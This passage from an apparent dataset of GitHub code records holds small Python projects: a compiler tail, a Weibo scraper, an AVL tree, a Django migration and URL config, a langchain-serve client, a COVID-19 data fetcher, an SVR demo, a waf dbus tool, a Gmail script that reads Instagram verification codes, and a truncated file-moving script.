converter = EngLangConverter()\n    program_name = converter.get_program_name(englang_code)\n    python_code = converter.convert(englang_code)\n\n    output_folder = \"./output/\"\n    output_filename = f\"{program_name.lower()}.py\"\n    output_file = os.path.join(output_folder, output_filename)\n\n    compiler_name = \"MostlyWhat's EngLang Compiler\"\n    language = \"EngLang\"\n\n    current_date = datetime.now().strftime(\"%Y-%m-%d\")\n    with open(output_file, \"w\") as f:\n        f.write(\n            f\"# Name: {program_name.title()}\\n# Author: {author}\\n# Language: {language}\\n# Compiled: {current_date}\\n# Compiler: {compiler_name}\\n# License: {file_license}\\n\\n\"\n        )\n        f.write(python_code)\n\n    print(f\"\\nGenerated Python file: {output_file}\")\n\n    run_code = input(\"\\nDo you want to run the generated code? [y/n]: \")\n    if run_code.lower() == \"y\":\n        os.system(f\"python {output_file}\")\n\n\n# `if __name__ == \"__main__\":` is a common Python idiom that checks whether the current script is\n# being run as the main program or if it is being imported as a module into another program. If the\n# script is being run as the main program, the `main()` function is called, which is the entry point\n# of the program. If the script is being imported as a module, the `main()` function is not called\n# automatically.\nif __name__ == \"__main__\":\n    main()\n","repo_name":"MostlyWhat/EngLang","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"11834947824","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# import the libraries\ndef getPage(url): # fetch the page content for the given link\n    headers = {\n        \"X-Infinitescroll\": \"true\",\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\"\n    }\n    return requests.get(url=url, headers=headers).content\n# 10 users per page; num is the page the crawl starts from\nnum=1\nuser = {}\nwhile(True):\n    page = getPage('https://weibo.cn/pub/top?cat=star&page=%d'%num)\n    # join the base URL with the page number to build the real URL, fetch the response with requests' get method and read the body via .content\n    soup = BeautifulSoup(page,'lxml')\n    # parse the page with BeautifulSoup; when no parser is given it automatically picks the best one available\n    # BeautifulSoup may emit a warning asking you to choose a parser, which can be ignored\n    for i in soup.select(\".nk\"):\n        user[i.get_text()] = i.get('href')\n    num+=1\n    if(num==11):\n        break\n\nview={}\nfor key,value in user.items():\n    tempsoup=BeautifulSoup(getPage(value),\"lxml\")\n    temstr=\"\"\n    for i in tempsoup.select('.c .ctt'):\n        temstr+=i.get_text()+'\\n'\n    view[key]=temstr\nfor key,value in view.items():\n    # a with-block closes the file reliably and avoids referencing `f` before assignment if open() fails\n    with open(key+'.txt','w', encoding='utf-8') as f:\n        f.write(key + '\\n' + value)\n","repo_name":"Demon-Wang/hw2","sub_path":"殷旺/weibo_ crawler.py","file_name":"weibo_ crawler.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"28264249305","text":"n = int(input())\nwhile(n != 0):\n    matriz = []\n\n\n    # fill in the first row of the matrix\n    lista = []\n    lista.append(1)\n    for i in range(1, n):\n        calculo = 2 ** i\n        lista.append(calculo)\n\n    matriz.append(lista)\n\n    for i in range(1, n):\n        lista = []\n        for j in range(0, n):\n            if (j == 0):\n                lista.append(matriz[i-1][1])\n            else:\n                calculo = matriz[i-1][j] * 2\n                lista.append(calculo)\n        matriz.append(lista)\n\n    ultimoElemento = len(str(matriz[n-1][n-1]))\n\n    for i in range(0, n, 1):\n        for j in range(0, n, 1):\n            if(j==n-1):\n                print(\"{:>{}d}\".format(matriz[i][j], ultimoElemento), end = \"\")\n            else:\n                
print(\"{:>{}d}\".format(matriz[i][j], ultimoElemento), end = \" \")\n print()\n print()\n n = int(input())\n","repo_name":"oliveiraeverton/uri","sub_path":"1557.py","file_name":"1557.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37722959057","text":"import pandas as pd\nimport graphviz \nimport pydot\n#Clase para crear nodos\nclass TreeNode:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.price = data[\"price\"]\n self.surface_total = data[\"surface_total\"]\n self.bedrooms = data[\"bedrooms\"]\n self.metric = self.calculate_metric()\n self.level = 1\n self.parent = None\n self.grandparent = None\n\n #Funcion para calcular la metrica\n def calculate_metric(self):\n return self.price / self.surface_total if self.surface_total != 0 else 0\n #Funcion para insertar un nodo, calcular el nivel, balancear y asignar nodo padre y abuelo.\n #Se utiliza el numero de cuartos como metrica secundaria para balancear el arbol\n def insert_node(self, data):\n if self.data.empty:\n self.data = data\n return\n\n metric = data[\"price\"] / data[\"surface_total\"]\n if metric < self.metric:\n if self.left:\n self.left.insert_node(data)\n else:\n self.left = TreeNode(data)\n elif metric > self.metric:\n if self.right:\n self.right.insert_node(data)\n else:\n self.right = TreeNode(data)\n else:\n if data[\"bedrooms\"] < self.bedrooms:\n if self.left:\n self.left.insert_node(data)\n else:\n self.left = TreeNode(data)\n else:\n if self.right:\n self.right.insert_node(data)\n else:\n self.right = TreeNode(data)\n\n self.metric = self.calculate_metric()\n self.level = self.calculate_level()\n\n self.parent = self\n self.grandparent = self.parent\n\n balance = self.get_balance()\n\n if balance > 1 and metric < self.left.metric:\n return self.rotate_right()\n\n if balance < -1 and metric > self.right.metric:\n return self.rotate_left()\n\n if balance > 1 and metric > self.left.metric:\n self.left = self.left.rotate_left()\n return self.rotate_right()\n\n if balance < -1 and metric < self.right.metric:\n self.right = self.right.rotate_right()\n return self.rotate_left()\n\n return self\n #funcion para insertar un nodo y graphicar el arbol\n def insert_new(self, data):\n if self.data.empty:\n self.data = data\n return\n\n metric = data[\"price\"] / data[\"surface_total\"]\n if metric < self.metric:\n if self.left:\n self.left.insert_new(data)\n else:\n self.left = TreeNode(data)\n elif metric > self.metric:\n if self.right:\n self.right.insert_new(data)\n else:\n self.right = TreeNode(data)\n else:\n if data[\"bedrooms\"] < self.bedrooms:\n if self.left:\n self.left.insert_new(data)\n else:\n self.left = TreeNode(data)\n else:\n if self.right:\n self.right.insert_new(data)\n else:\n self.right = TreeNode(data)\n self.metric = self.calculate_metric()\n self.level = self.calculate_level()\n\n self.parent = self\n self.grandparent = self.parent\n\n # renderiza el arbol\n self.render_tree_graph()\n\n#Funcion para eliminar un nodo y balancear el arbol despues de eliminado.\n def delete_node(self, metric):\n if not self.data:\n return self\n\n if metric < self.metric:\n if self.left:\n self.left = self.left.delete_node(metric)\n elif metric > self.metric:\n if self.right:\n self.right = self.right.delete_node(metric)\n else:\n if not self.left:\n return self.right\n elif not self.right:\n return self.left\n else:\n successor = self.right.get_minimum_node()\n self.data = 
successor.data\n self.right = self.right.delete_node(successor.metric)\n\n self.metric = self.calculate_metric()\n self.level = self.calculate_level()\n\n balance = self.get_balance()\n\n if balance > 1 and self.right and metric < self.left.metric:\n return self.rotate_right()\n\n if balance < -1 and self.left and metric > self.right.metric:\n return self.rotate_left()\n\n if balance > 1 and self.right and metric > self.left.metric:\n self.left = self.left.rotate_left()\n return self.rotate_right()\n\n if balance < -1 and self.left and metric < self.right.metric:\n self.right = self.right.rotate_right()\n return self.rotate_left()\n\n return self\n#Funcion para buscar un nodo\n def search_node(self, metric):\n if self.metric == metric:\n return self.data\n\n if metric < self.metric and self.left:\n return self.left.search_node(metric)\n elif metric > self.metric and self.right:\n return self.right.search_node(metric)\n\n return None\n#Funcion para obtener el nodo mas bajo\n def get_minimum_node(self):\n current = self\n while current.left:\n current = current.left\n return current\n#funcion para obtener el balance\n def get_balance(self):\n return self.get_height(self.left) - self.get_height(self.right)\n#funcion para rotar el arbol a la izquierda\n def rotate_left(self):\n y = self.right\n T2 = y.left\n\n y.left = self\n self.right = T2\n\n self.metric = self.calculate_metric()\n y.metric = y.calculate_metric()\n\n self.level = self.calculate_level()\n y.level = y.calculate_level()\n\n return y\n#funcion para rotar el arbol a la derecha\n def rotate_right(self):\n x = self.left\n T2 = x.right\n \n x.right = self\n self.left = T2\n \n self.metric = self.calculate_metric()\n x.metric = x.calculate_metric()\n \n self.level = self.calculate_level()\n x.level = x.calculate_level()\n \n return x\n#funciones para obtener la altura, calcular el nivel del arbol y devolverlo\n def get_height(self, node):\n if not node:\n return 0\n return 1 + max(self.get_height(node.left), self.get_height(node.right))\n \n def calculate_level(self):\n return 1 + max(self.get_level(self.left), self.get_level(self.right))\n \n def get_level(self, node):\n if not node:\n return 0\n return node.level\n #Funcion para buscar nodos con metricas\n def search_nodes_with_metrics(self, metrics):\n result = []\n self._search_nodes_with_metrics(metrics, result)\n return result\n#funcion recursiva para buscar nodos\n def _search_nodes_with_metrics(self, metrics, result):\n if self.metric == metrics[0]:\n if len(metrics) == 1:\n result.append(self.data)\n else:\n self._search_nodes_with_metrics(metrics[1:], result)\n\n if self.left and self.metric >= metrics[0]:\n self.left._search_nodes_with_metrics(metrics, result)\n\n if self.right and self.metric <= metrics[0]:\n self.right._search_nodes_with_metrics(metrics, result)\n #Funcion para imprimir el orden del nivel\n def print_level_order(self):\n height = self.get_height(self)\n for level in range(1, height + 1):\n self._print_current_level(self, level)\n#Funcion para imprimir el nivel actual\n def _print_current_level(self, node, level):\n if node is None:\n return\n if level == 1:\n print(node.data)\n elif level > 1:\n self._print_current_level(node.left, level - 1)\n self._print_current_level(node.right, level - 1)\n #funciones para encontrar nodo padre, abuelo y tio\n def find_father(self):\n return self.parent\n\n def find_grandfather(self):\n return self.grandparent\n\n def find_uncle(self):\n if self.parent is None or self.grandparent is None:\n return None\n \n if 
self.parent is self.grandparent.left:\n return self.grandparent.right\n \n return self.grandparent.left\n #Funcion para renderizar el arbol\n def render_tree_graph(self):\n graph = pydot.Dot(graph_type=\"graph\")\n \n # viajar por el arbol segun el orden y agregar nodos al nivel\n queue = [(self, 1)]\n while queue:\n node, level = queue.pop(0)\n graph_node = pydot.Node(str(node.metric), label=\"Metric: {}\".format(node.metric))\n graph.add_node(graph_node)\n if node.left:\n left_node = pydot.Node(str(node.left.metric))\n graph.add_node(left_node)\n graph.add_edge(pydot.Edge(graph_node, left_node))\n queue.append((node.left, level + 1))\n if node.right:\n right_node = pydot.Node(str(node.right.metric))\n graph.add_node(right_node)\n graph.add_edge(pydot.Edge(graph_node, right_node))\n queue.append((node.right, level + 1))\n \n # Save the graph to a file\n graph.write_png(\"avl_tree_graph.png\")\n\n# Leer el dataset\ndata = pd.read_csv(\"co_properties_final.csv\")\n\n# Crear el arbol inicial\nroot = None\nfor x in range(0,len(data)):\n if root is None:\n root = TreeNode(data.loc[0])\n else:\n root.insert_node(data.loc[x])\n\n# Renderizar el arbol inicial\nroot.render_tree_graph()","repo_name":"jgayon/Lab_Est-Datos-2","sub_path":"Codigo.py","file_name":"Codigo.py","file_ext":"py","file_size_in_byte":9713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1214572267","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Country',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50, verbose_name='Name')),\n ('iso_code', models.CharField(unique=True, max_length=2, verbose_name='ISO code')),\n ('iso_numeric', models.CharField(unique=True, max_length=3, verbose_name='ISO numeric code')),\n ('iso_alpha3', models.CharField(unique=True, max_length=3, verbose_name='ISO alpha-3')),\n ('fips_code', models.CharField(unique=True, max_length=2, verbose_name='FIPS code')),\n ('continent', models.CharField(max_length=2, verbose_name='Continent')),\n ('capital', models.CharField(max_length=30, verbose_name='Capital', blank=True)),\n ('area_in_sq_km', models.FloatField(verbose_name='Area in square kilometers')),\n ('population', models.IntegerField(verbose_name='Population')),\n ('currency_code', models.CharField(max_length=3, verbose_name='Currency code')),\n ('languages', models.CharField(max_length=60, verbose_name='Languages')),\n ('geoname_id', models.IntegerField(verbose_name='Geonames ID')),\n ('bbox_west', models.FloatField()),\n ('bbox_north', models.FloatField()),\n ('bbox_east', models.FloatField()),\n ('bbox_south', models.FloatField()),\n ('num_people', models.IntegerField(default=0, verbose_name='Number of people')),\n ],\n options={\n 'ordering': ('name',),\n 'verbose_name': 'Country',\n 'verbose_name_plural': 'Countries',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='CountrySite',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=100, verbose_name='Title')),\n ('url', models.URLField(max_length=255, verbose_name='URL')),\n ('country', 
models.ForeignKey(\n verbose_name='Country', to='djangopeople.Country', on_delete=models.CASCADE,\n )),\n ],\n options={\n 'verbose_name': 'Country site',\n 'verbose_name_plural': 'Country sites',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DjangoPerson',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('bio', models.TextField(verbose_name='Bio', blank=True)),\n ('latitude', models.FloatField(verbose_name='Latitude')),\n ('longitude', models.FloatField(verbose_name='Longitude')),\n ('location_description', models.CharField(max_length=50, verbose_name='Location')),\n ('photo', models.FileField(upload_to='profiles', blank=True)),\n ('profile_views', models.IntegerField(default=0, verbose_name='Profile views')),\n ('openid_server', models.URLField(max_length=255, verbose_name='OpenID server', blank=True)),\n ('openid_delegate', models.URLField(max_length=255, verbose_name='OpenID delegate', blank=True)),\n ('last_active_on_irc', models.DateTimeField(null=True, verbose_name='Last active on IRC', blank=True)),\n ('country', models.ForeignKey(\n verbose_name='Country', to='djangopeople.Country', on_delete=models.CASCADE,\n )),\n ],\n options={\n 'verbose_name': 'Django person',\n 'verbose_name_plural': 'Django people',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='PortfolioSite',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=100, verbose_name='Title')),\n ('url', models.URLField(max_length=255, verbose_name='URL')),\n ('contributor', models.ForeignKey(\n verbose_name='Contributor', to='djangopeople.DjangoPerson', on_delete=models.CASCADE,\n )),\n ],\n options={\n 'verbose_name': 'Portfolio site',\n 'verbose_name_plural': 'Portfolio sites',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Region',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('code', models.CharField(max_length=20, verbose_name='Code')),\n ('name', models.CharField(max_length=50, verbose_name='Name')),\n ('flag', models.CharField(max_length=100, verbose_name='Flag', blank=True)),\n ('bbox_west', models.FloatField()),\n ('bbox_north', models.FloatField()),\n ('bbox_east', models.FloatField()),\n ('bbox_south', models.FloatField()),\n ('num_people', models.IntegerField(default=0, verbose_name='Number of people')),\n ('country', models.ForeignKey(\n verbose_name='Country', to='djangopeople.Country', on_delete=models.CASCADE,\n )),\n ],\n options={\n 'ordering': ('name',),\n 'verbose_name': 'Region',\n 'verbose_name_plural': 'Regions',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='djangoperson',\n name='region',\n field=models.ForeignKey(\n verbose_name='Region', blank=True, to='djangopeople.Region',\n null=True, on_delete=models.CASCADE,\n ),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='djangoperson',\n name='user',\n field=models.OneToOneField(\n verbose_name='User', to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE,\n ),\n preserve_default=True,\n ),\n ]\n","repo_name":"WeilerWebServices/Django","sub_path":"djangopeople/djangopeople/djangopeople/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"36779196709","text":"from 
django.conf.urls import url\nfrom . import views\n\napp_name = 'order'\nurlpatterns = [\n url(r'^$', views.main_page, name='main_page'),\n url(r'^ordermeats/new/$', views.new_ordermeat, name='new_ordermeat'),\n url(r'^orderers/new/$', views.new_order, name='new_orderer'),\n url(r'^orderers/login/$', views.login_order, name='login_orderer'),\n url(r'^orderers/(?P\\d+)/orders/$', views.view_order, name='view_order'),\n url(r'^orders/new/$', views.new_order, name='new_order'),\n url(r'^.*$', views.redirect_main_page, name='redirect_main_page'),\n]","repo_name":"MTmeat/jihun-MT-meat","sub_path":"jihunMTmeat/order/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"12216513505","text":"import asyncio\nimport os\nfrom typing import Dict\n\nimport aiohttp\nfrom pydantic import BaseModel, ValidationError\n\n\nclass Response(BaseModel):\n result: str\n error: str\n stdout: str\n\n\nclass HumanPrompt(BaseModel):\n prompt: str\n\n\nasync def hitl_client(url: str, name: str, question: str, envs: Dict = {}):\n async with aiohttp.ClientSession() as session:\n async with session.ws_connect(f'{url}/{name}') as ws:\n print(f'Connected to {url}/{name}.')\n\n await ws.send_json(\n {\n \"question\": question,\n \"envs\": envs if envs else {},\n }\n )\n\n async for msg in ws:\n if msg.type == aiohttp.WSMsgType.TEXT:\n if msg.data == 'close cmd':\n await ws.close()\n break\n else:\n try:\n response = Response.parse_raw(msg.data)\n print(response.result, end='')\n except ValidationError:\n try:\n prompt = HumanPrompt.parse_raw(msg.data)\n answer = input(prompt.prompt + '\\n')\n await ws.send_str(answer)\n except ValidationError:\n print(f'Unknown message: {msg.data}')\n\n elif msg.type == aiohttp.WSMsgType.ERROR:\n print('ws connection closed with exception %s' % ws.exception())\n else:\n print(msg)\n\n\nasyncio.run(\n hitl_client(\n url='wss://langchain-72aff35874.wolf.jina.ai',\n name='hitl',\n question='What is Eric Zhu\\'s birthday?',\n envs={\n 'OPENAI_API_KEY': os.environ['OPENAI_API_KEY'],\n },\n )\n)\n","repo_name":"jina-ai/langchain-serve","sub_path":"examples/websockets/hitl/hitl_client.py","file_name":"hitl_client.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":1530,"dataset":"github-code","pt":"86"} +{"seq_id":"15595688811","text":"def make_requests():\n import requests\n import json\n r = requests.get('https://api.covid19india.org/data.json')\n package_json = r.json()\n r2 = requests.get('https://api.covid19india.org/state_district_wise.json')\n package_json_district = r2.json()\n package_str = json.dumps(package_json, indent=2)\n package_str_district = json.dumps(package_json_district, indent=2)\n return package_json, package_json_district\n\n\ndef find_state(state_dict):\n new_state_dict = {}\n new_state_dict['statecode'] = state_dict['statecode']\n new_state_dict['state'] = state_dict['state']\n new_state_dict['confirmed'] = state_dict['confirmed']\n new_state_dict['active'] = state_dict['active']\n new_state_dict['recovered'] = state_dict['recovered']\n new_state_dict['deaths'] = state_dict['deaths']\n return new_state_dict\n\n\ndef find_district(district_dict):\n new_district_dict = {}\n # new_district_dict['state'] = district_dict['state']\n new_district_dict['confirmed'] = district_dict['confirmed']\n new_district_dict['active'] = district_dict['active']\n new_district_dict['recovered'] = 
district_dict['recovered']\n    new_district_dict['deaths'] = district_dict['deceased']\n    return new_district_dict\n\n\ndef search(given_input):\n    from data import make_requests\n\n    package_json, package_json_district = make_requests()\n\n    dict_state_search_found = {}\n    dict_district_search_found = {}\n\n    for state in package_json['statewise']:\n        if given_input.lower() == state['state'].lower() or given_input.lower() == state['statecode'].lower():\n            print(state, '\\n')\n            dict_state_search_found[state['state']] = state\n        elif given_input.lower() in state['state'].lower():\n            dict_state_search_found[state['state']] = state\n    # print(dict_state_search_found)\n    # SAMPLE ELEMENT : 'Maharashtra': {'active': '18381', 'confirmed': '24427', 'deaths': '921', 'deltaconfirmed': '0', 'deltadeaths': '0', 'deltarecovered': '0', 'lastupdatedtime': '12/05/2020 22:13:24', 'recovered': '5125', 'state': 'Maharashtra', 'statecode': 'MH', 'statenotes': '[10-May]
\\n- Total numbers are updated to the final figure reported for 10th May.
\\n- 665 cases added by MH govt. on 10th May due to data cleaning
\\n- 143 cases added by MH govt. on 5th May due to data cleaning
\\n- 796 cases added by MH govt. on 4th May due to data cleaning
'}\n\n    for state_name in package_json_district.keys():\n        for district in package_json_district[state_name]['districtData'].keys():\n            if district.lower() == given_input.lower():\n                dict_district_search_found[district] = package_json_district[state_name]['districtData'][district]\n            elif given_input.lower() in district.lower():\n                dict_district_search_found[district] = package_json_district[state_name]['districtData'][district]\n    # print('\\n\\n', dict_district_search_found)\n    # SAMPLE ELEMENT : 'North and Middle Andaman': {'notes': '', 'active': 0, 'confirmed': 1, 'deceased': 0, 'recovered': 1, 'delta': {'confirmed': 0, 'deceased': 0, 'recovered': 0}}\n    return dict_state_search_found, dict_district_search_found\n\n\ndef find_total_state():\n    from data import find_state\n    from data import make_requests\n    from data import get_country_data\n    package_json, package_json_district = make_requests()\n    full_dict_state = {}\n    full_dict_state['India'] = find_state(get_country_data())\n    for i in package_json['statewise'][1:]:\n        full_dict_state[i['state']] = find_state(i)\n\n    return full_dict_state\n\n\ndef get_country_data():\n    from data import find_state\n    from data import make_requests\n    package_json, package_json_district = make_requests()\n    data_country = package_json['statewise'][0]\n    data_country['state'] = 'India'\n    return data_country\n\n\ndef find_total_district():\n    from data import make_requests\n    from data import find_district\n    package_json, package_json_district = make_requests()\n    full_dict_district = {}\n\n    for state_name in package_json_district.keys():\n        for district in package_json_district[state_name]['districtData'].keys():\n            add_this = find_district(\n                package_json_district[state_name]['districtData'][district])\n            add_this['district'] = district\n            full_dict_district[district] = add_this\n    return full_dict_district\n","repo_name":"Arnav17Sharma/Covid19India","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1250849668","text":"#import the libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.svm import SVR #support vector regression\r\n\r\n#get the dataset\r\ndataframe = pd.read_csv(\"Position_Salaries.csv\")\r\n\r\n#get the independent and dependent variables\r\nX = dataframe.iloc[: , 1].values\r\ny = dataframe.iloc[: , 2].values\r\n\r\n#reshape the arrays\r\nX = X.reshape(-1,1)\r\ny = y.reshape(-1,1)\r\n\r\n#implement feature scaling\r\nsc_X = StandardScaler()\r\nsc_y = StandardScaler()\r\nX = sc_X.fit_transform(X)\r\ny = sc_y.fit_transform(y)\r\n\r\n#fit the data to our model\r\nregressor = SVR(kernel='rbf') #radial basis function\r\nregressor.fit(X , y)\r\n\r\n#make the prediction values a numpy array and transform it into proper scale\r\nval = np.array([6.5]).reshape(-1,1)\r\nval = sc_X.transform(val)\r\nprediction = regressor.predict(val)\r\nprediction = sc_y.inverse_transform(prediction)\r\n\r\n#plot the graph\r\nX_grid = np.arange(min(X) , max(X) , 0.1)\r\nX_grid = X_grid.reshape((len(X_grid) , 1))\r\nplt.scatter(X , y , color=\"red\")\r\nplt.plot(X_grid , regressor.predict(X_grid) , color=\"green\")\r\nplt.title(\"truth salary (SVR model)\")\r\nplt.xlabel(\"level\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n#print out the result\r\nprint(\"\\n\\nThe prediction made is \" , 
end=\"\")\r\nprint(prediction)\r\n","repo_name":"mikias21/Code-For-Algorithms-","sub_path":"svrmodel.py","file_name":"svrmodel.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"41048084140","text":"#!/usr/bin/env python\n# encoding: utf-8\n# Ali Sabil, 2007\n\n\"\"\"\nCompiles dbus files with **dbus-binding-tool**\n\nTypical usage::\n\n\tdef options(opt):\n\t\topt.load('compiler_c dbus')\n\tdef configure(conf):\n\t\tconf.load('compiler_c dbus')\n\tdef build(bld):\n\t\ttg = bld.program(\n\t\t\tincludes = '.',\n\t\t\tsource = bld.path.ant_glob('*.c'),\n\t\t\ttarget = 'gnome-hello')\n\t\ttg.add_dbus_file('test.xml', 'test_prefix', 'glib-server')\n\"\"\"\n\nfrom waflib import Task, Errors\nfrom waflib.TaskGen import taskgen_method, before_method\n\n@taskgen_method\ndef add_dbus_file(self, filename, prefix, mode):\n\t\"\"\"\n\tAdds a dbus file to the list of dbus files to process. Store them in the attribute *dbus_lst*.\n\n\t:param filename: xml file to compile\n\t:type filename: string\n\t:param prefix: dbus binding tool prefix (--prefix=prefix)\n\t:type prefix: string\n\t:param mode: dbus binding tool mode (--mode=mode)\n\t:type mode: string\n\t\"\"\"\n\tif not hasattr(self, 'dbus_lst'):\n\t\tself.dbus_lst = []\n\tif not 'process_dbus' in self.meths:\n\t\tself.meths.append('process_dbus')\n\tself.dbus_lst.append([filename, prefix, mode])\n\n@before_method('process_source')\ndef process_dbus(self):\n\t\"\"\"\n\tProcesses the dbus files stored in the attribute *dbus_lst* to create :py:class:`waflib.Tools.dbus.dbus_binding_tool` instances.\n\t\"\"\"\n\tfor filename, prefix, mode in getattr(self, 'dbus_lst', []):\n\t\tnode = self.path.find_resource(filename)\n\t\tif not node:\n\t\t\traise Errors.WafError('file not found ' + filename)\n\t\ttsk = self.create_task('dbus_binding_tool', node, node.change_ext('.h'))\n\t\ttsk.env.DBUS_BINDING_TOOL_PREFIX = prefix\n\t\ttsk.env.DBUS_BINDING_TOOL_MODE = mode\n\nclass dbus_binding_tool(Task.Task):\n\t\"\"\"\n\tCompiles a dbus file\n\t\"\"\"\n\tcolor = 'BLUE'\n\text_out = ['.h']\n\trun_str = '${DBUS_BINDING_TOOL} --prefix=${DBUS_BINDING_TOOL_PREFIX} --mode=${DBUS_BINDING_TOOL_MODE} --output=${TGT} ${SRC}'\n\tshell = True # temporary workaround for #795\n\ndef configure(conf):\n\t\"\"\"\n\tDetects the program dbus-binding-tool and sets ``conf.env.DBUS_BINDING_TOOL``\n\t\"\"\"\n\tconf.find_program('dbus-binding-tool', var='DBUS_BINDING_TOOL')\n\n","repo_name":"audacity/audacity","sub_path":"lib-src/lv2/lv2/waflib/Tools/dbus.py","file_name":"dbus.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":10471,"dataset":"github-code","pt":"86"} +{"seq_id":"70415223646","text":"import httplib2\nimport os\nfrom oauth2client import client, tools, file\nimport base64\nfrom googleapiclient import errors, discovery\nimport constants\nfrom bs4 import BeautifulSoup\nimport base64\n\ndef get_oath_credentials():\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir, constants.CREDENTIAL_FILE_NAME)\n store = file.Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(constants.CLIENT_SECRET_FILE, constants.SCOPES)\n flow.user_agent = constants.APPLICATION_NAME\n credentials = 
tools.run_flow(flow, store)\n print(('Storing credentials to ' + credential_path))\n return credentials\n\ndef list_messages_matching_query(service, user_id, query=''):\n try:\n response = service.users().messages().list(userId=user_id, q=query).execute()\n messages = []\n if 'messages' in response:\n messages.extend(response['messages'])\n\n while 'nextPageToken' in response:\n page_token = response['nextPageToken']\n response = service.users().messages().list(userId=user_id, q=query,\n pageToken=page_token).execute()\n messages.extend(response['messages'])\n\n return messages\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n\ndef get_message(service, user_id, msg_id):\n try:\n message = service.users().messages().get(userId=user_id, id=msg_id).execute()\n # print('Message snippet: %s' % message['snippet'])\n return message\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n\ndef is_useful(headers):\n count = 0\n for header in headers:\n if header['name']=='Subject' and header['value'].strip()=='Verify Your Account':\n count += 1\n if header['name']=='From' and header['value'].strip()=='Instagram ':\n count += 1\n if count == 2:\n return True\n else:\n return False\n\ndef get_code(msg):\n bodydata = msg['payload']['body']['data']\n decoded_bodydata = base64.urlsafe_b64decode(bodydata)\n soup = BeautifulSoup(decoded_bodydata, features=\"html.parser\")\n f = soup.find('font')\n return f.contents[0]\n\ndef main():\n credentials = get_oath_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n messages = list_messages_matching_query(service, \"me\", query=constants.QUERY_TERM)\n for message in messages:\n msg = get_message(service, \"me\", message['id'])\n headers = msg['payload']['headers']\n if is_useful(headers):\n print(get_code(msg))\n # break\n\nif __name__ == '__main__':\n main()\n","repo_name":"ishandutta2007/fetch-instagram-otp-from-gmail","sub_path":"fetch_from_mail.py","file_name":"fetch_from_mail.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"12292255834","text":"import os\nimport shutil\nimport sys\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--src', type=str, required=True, help='input directory')\nparser.add_argument('--stride', type=int, required=True, help='distance between samples')\nparser.add_argument('--dest', type=str, required=True, help='output directory')\nargs = parser.parse_args()\n\nin_dir = args.src\nstride = args.stride\nout_dir = args.dest\n\n# If stride is 3 and you have 4 files, file 3 will be moved leaving files 1, 2, and 4.\n# If stride is 3 you have 6 files files 3 and 6 will be moved leaving files 1, 2, 4, and 5.\n\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\ni=0\nfor basename in os.listdir(in_dir):\n if basename.endswith('.wav'):\n pathname = os.path.join(in_dir, basename)\n if os.path.isfile(pathname):\n if (i == 0):\n shutil.move(pathname, out_dir)\n # print(\"moving \" + pathname 